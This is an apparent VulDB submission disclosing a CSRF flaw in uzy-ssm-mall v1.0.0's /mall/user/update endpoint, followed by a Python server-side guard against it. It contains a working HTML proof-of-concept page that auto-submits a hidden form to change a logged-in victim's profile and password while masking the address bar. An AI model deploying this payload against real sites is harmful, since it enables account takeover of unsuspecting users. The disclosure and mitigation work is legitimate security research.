Submit #549268: ghostxbh uzy-ssm-mall v1.0.0 CSRF

Title: ghostxbh uzy-ssm-mall v1.0.0 CSRF
Description:

Vulnerability Description
In uzy-ssm-mall v1.0.0, the /mall/user/update interface lacks CSRF (Cross-Site Request Forgery) protection: it neither verifies an anti-CSRF token nor otherwise validates that the request was initiated by the user. An attacker can therefore craft a malicious page that, when opened by a logged-in user, silently submits a forged request and modifies that user's personal information without their knowledge. The captured request also carries user_password and user_password_one, so the same forged request can set a new password for the victim.

Vulnerability Location
The vulnerability is located at the /mall/user/update interface.

Code Audit Process
The vulnerability occurs in the user information modification interface, /mall/user/update.

POC
1. Construct a CSRF PoC from the captured request packet and host it at attack.com/1.html.
2. Send attack.com/1.html to the target user and entice them to open the link.
3. Successful exploitation: the personal information of the attacked user is modified.

The PoC page. The history.pushState call rewrites the attacker URL's path in the address bar to "/" so the victim sees a less suspicious location, and the form is submitted automatically as soon as the page loads:

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://x.x.x.x:8080/mall/user/update" method="POST">
      <input type="hidden" name="user_profile_picture_src" value="" />
      <input type="hidden" name="user_nickname" value="aaq" />
      <input type="hidden" name="user_realname" value="awq" />
      <input type="hidden" name="user_password" value="123456qaz" />
      <input type="hidden" name="user_password_one" value="123456qaz" />
      <input type="hidden" name="user_gender" value="0" />
      <input type="hidden" name="user_birthday" value="2024-01-01" />
      <input type="hidden" name="user_address" value="110101" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
```

Caveat: the forged POST only carries the victim's session if the browser attaches the session cookie to a cross-site, top-level form submission. A session cookie marked SameSite=Lax or SameSite=Strict is not sent with such a request, so the PoC succeeding also confirms that the cookie lacks those attributes.
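A server-side guard for this interface, as an added example that is not uzy-ssm-mall's own code: it requires the Origin header (or, failing that, Referer) to name the mall itself and the form to carry a per-session synchronizer token, then runs both checks against the forged request the PoC above generates and against a legitimate same-origin submission. The request shape (a dict with headers, form and session_id), the `_csrf` field name, the session-store dict and the APP_ORIGIN value are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not uzy-ssm-mall code. A request is modelled as a plain dict with
# "headers", "form" and "session_id" keys; APP_ORIGIN is taken from the PoC's form action.
APP_ORIGIN = "http://x.x.x.x:8080"

# Field names and values from the captured /mall/user/update request in the PoC.
POC_FORM = {
    "user_profile_picture_src": "",
    "user_nickname": "aaq",
    "user_realname": "awq",
    "user_password": "123456qaz",
    "user_password_one": "123456qaz",
    "user_gender": "0",
    "user_birthday": "2024-01-01",
    "user_address": "110101",
}


def issue_csrf_token(session_store: dict, session_id: str) -> str:
    """Mint a per-session synchronizer token; the app embeds it in its own forms."""
    token = secrets.token_urlsafe(32)
    session_store[session_id] = token
    return token


def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is the app itself.

    Browsers send Origin on cross-site form POSTs, so a request carrying neither
    header is treated as unsafe rather than waved through.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == APP_ORIGIN


def token_valid(session_store: dict, session_id: str, form: dict) -> bool:
    """Constant-time comparison of the submitted token against the session's token."""
    expected = session_store.get(session_id)
    supplied = form.get("_csrf")
    if expected is None or supplied is None:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def csrf_safe(request: dict, session_store: dict) -> bool:
    """Gate to run before /mall/user/update touches the profile."""
    return origin_allowed(request["headers"]) and token_valid(
        session_store, request["session_id"], request["form"]
    )


# Constructed requests, shaped as a browser would deliver them.
def poc_request(session_id: str) -> dict:
    """The forged POST from attack.com/1.html: victim's session, attacker's Origin, no token."""
    return {
        "session_id": session_id,
        "headers": {"Origin": "http://attack.com", "Referer": "http://attack.com/"},
        "form": dict(POC_FORM),
    }


def legit_request(session_id: str, token: str, via_referer: bool = False) -> dict:
    """The same update submitted from the mall's own profile page, carrying its token."""
    if via_referer:
        headers = {"Referer": APP_ORIGIN + "/mall/user/profile"}  # assumed page path
    else:
        headers = {"Origin": APP_ORIGIN}
    form = dict(POC_FORM, _csrf=token)
    return {"session_id": session_id, "headers": headers, "form": form}


if __name__ == "__main__":
    store = {}
    tok = issue_csrf_token(store, "victim-session")
    print("PoC request accepted:", csrf_safe(poc_request("victim-session"), store))
    print("Legitimate request accepted:", csrf_safe(legit_request("victim-session", tok), store))
```

The two checks fail for different reasons and back each other up: the attacker's page cannot read the victim's token because of the same-origin policy, and the browser will not let a page forge its own Origin header. In a Spring MVC application the token half of this is what Spring Security's CsrfFilter enforces. The Origin/Referer check is a backstop rather than a substitute, since some clients and referrer policies strip Referer; rejecting requests that carry neither header is the conservative choice for a state-changing endpoint.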
Source: https://wiki.shikangsi.com/post/share/4ccab5f6-4f54-4bac-b0fc-a436884432ff
User: XingYue_Mstir (UID 72225)
Submission: 04/02/2025 11:59 AM
Moderation: 04/14/2025 12:36 AM (12 days later)
Status: Accepted
VulDB entry: 304602 [ghostxbh uzy-ssm-mall 1.0.0 cross-site request forgery]
Points: 20
